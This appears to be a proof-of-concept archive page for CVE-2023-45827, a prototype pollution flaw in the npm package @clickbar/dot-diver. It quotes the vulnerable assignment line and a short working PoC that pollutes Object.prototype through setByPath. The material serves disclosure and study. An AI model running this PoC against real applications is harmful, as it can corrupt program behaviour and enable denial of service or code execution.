关联漏洞
描述
pp
介绍
# CVE-2023-45827
## 취약점 개요
- CVE-2023-45827
- CVSS : 9.8
- Nov 3, 2023
- ProtoType Pollution in node.js package
- rebob 프로젝트의 일환
## 취약점 설명
[github advisories](https://github.com/clickbar/dot-diver/security/advisories/GHSA-9w5f-mw3p-pj47)
This is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.
**vulnerable code**
```
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
//eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
```
**poc**
```
import { getByPath, setByPath } from '@clickbar/dot-diver'
console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo
```
It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.
[target package](https://www.npmjs.com/package/@clickbar/dot-diver)
文件快照
[4.0K] /data/pocs/2be00be074107770cc8e250c2af6d5c8dade646e
└── [ 902] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。